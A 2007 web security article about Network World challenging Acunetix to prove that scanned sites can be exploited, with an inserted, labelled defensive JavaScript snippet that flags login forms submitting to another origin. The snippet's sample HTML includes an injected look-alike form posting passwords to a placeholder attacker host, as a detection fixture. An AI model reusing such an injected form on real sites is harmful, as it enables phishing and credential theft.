Acunetix challenged to put up or shut up
Written by Editor   
Wednesday, 14 February 2007 21:28
After yesterday's announcement by Acunetix of its year-long survey of web site security, Joel Snyder of Network World has challenged Acunetix to a $1,000 bet to prove its original claim. Joel's challenge: take a selection of the 3,200 sites in which Acunetix discovered medium- to high-risk vulnerabilities and exploit them to steal personal information from 30% of them.

So Nick Galea (CEO) and Kevin J. Vella (VP Sales and Operations) of Acunetix accepted the challenge with a proviso of their own: that they try this against Network World's web site and not those other sites. Sure, they could do this against the other sites, but without the permission of the owners it would land someone in court. Plus, the moment they compromise someone's information it sets in motion all kinds of other consequences.

Now Network World and Snyder have come back to the response by Acunetix here. It seems that they are haggling over which web sites should be hacked and what should constitute a hack. So it is a watch-this-space moment to see who wins out.

Thing is, we think Joel is missing the point somewhat. Firstly, it isn't just about stealing personal information from databases; that is a blinkered view of what is really at risk when you're talking about web site security. Sure, there is a fair share of the "let's steal the information held on such-and-such web site" kind of attack, and I bet a good chunk of those 3,200 sites with SQL injection problems would give up information in this way.

But in the Web 2.0 generation a good chunk of the security risk is pushed back onto the user, not the company that runs the web site. Remember, a Cross-Site Scripting hole, if exploited creatively, can get users to give up their information to the bad guys themselves.

Sure, things like stealing cookies are all well and good, and some of them will be useful. But that is not where the money is. The money is in tricking the user into entering their PayPal or bank details into a page they think is legitimate, so that the details get sent to the bad guys and not to the place the user thinks they will. Turning a potential vulnerability into an actual vulnerability is why people pay security professionals to break into sites and find these holes. It isn't just scanning a site with such-and-such tool, printing a report and handing it to the client; it is taking the output of that tool, the manual testing performed by the tester, and the tester's experience and knowledge, and combining all of that to identify a real and exploitable vulnerability. Then it is putting that into the context of the client, developing a mitigation and quantifying the actual risk.
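As an added illustration of that point, written for this page and not part of the original article: a small JavaScript check, from the defender's side, that scans a page's HTML for credential-collecting forms whose submission target resolves to a different origin than the page, which is exactly what an injected look-alike login form looks like. It uses only Node's built-in `URL` class; the collector host in the sample is a constructed placeholder.

```javascript
// Added example, not from the original article: flag forms in a page's HTML that
// collect a password-like field but submit to a different origin than the page.
// That is the injected "look-alike login form" the text describes. Parsing is a
// small regex scan for illustration, not a full HTML parser; `URL` is Node's built-in.

const FORM_RE = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
const INPUT_RE = /<input\b([^>]*)>/gi;
const ATTR_RE = /([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/gi;

// Parse a tag's attribute text into an object keyed by lowercase attribute name.
function parseAttrs(attrText) {
  const attrs = {};
  for (const m of attrText.matchAll(ATTR_RE)) attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? "";
  return attrs;
}

// True for inputs that would carry credentials or payment data.
function isSensitive(a) {
  return (a.type || "").toLowerCase() === "password" ||
    /pass|card|cvv|account/i.test(a.name || "") ||
    (a.autocomplete || "").toLowerCase().startsWith("cc-");
}

// Return [{action, fields}] for every credential-collecting form whose resolved
// action is not the page's own origin (an empty action posts back to the page).
function findOffOriginCredentialForms(html, pageUrl) {
  const pageOrigin = new URL(pageUrl).origin;
  const findings = [];
  for (const f of html.matchAll(FORM_RE)) {
    const attrs = parseAttrs(f[1]);
    const fields = [...f[2].matchAll(INPUT_RE)].map((i) => parseAttrs(i[1])).filter(isSensitive);
    if (fields.length === 0) continue;
    let target = null;
    try { target = new URL(attrs.action || "", pageUrl); } catch { /* unparsable action: treat as off-origin */ }
    // "javascript:" actions parse but have origin "null", so they are flagged too.
    if (target === null || target.origin !== pageOrigin) {
      findings.push({ action: attrs.action || "", fields: fields.map((a) => a.name || a.type) });
    }
  }
  return findings;
}

// Constructed sample: the site's real login form, a form injected via XSS that
// mimics it but posts to an attacker-controlled host (placeholder), and a search box.
const SAMPLE_HTML = `
<form method="post" action="/login"><input name="user"><input type="password" name="pass"></form>
<div id="promo"><form action="https://collector.example.invalid/grab" method="post">
  <input name="user"><input type="password" name="pass"></form></div>
<form action="/search"><input name="q"></form>`;
```

Running this against the DOM after scripts have executed also catches forms injected at runtime rather than present in the raw HTML; the browser-side equivalent is a Content-Security-Policy `form-action 'self'` directive, which blocks submissions to other origins outright.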

The security world is a fast-changing place: technology moves at a pace, and security risks and threat vectors change almost as fast. With every technology advance there is a whole new crop of risks and threat vectors. In the late 90s it was all about network security; web application security wasn't even considered. Now that network security is fairly well understood by businesses, the bulk of the effort is spent securing web applications. Moving forward, application security is still key, but as web application technology evolves the way you look at the security problem has to change.

Last Updated ( Wednesday, 14 February 2007 21:50 )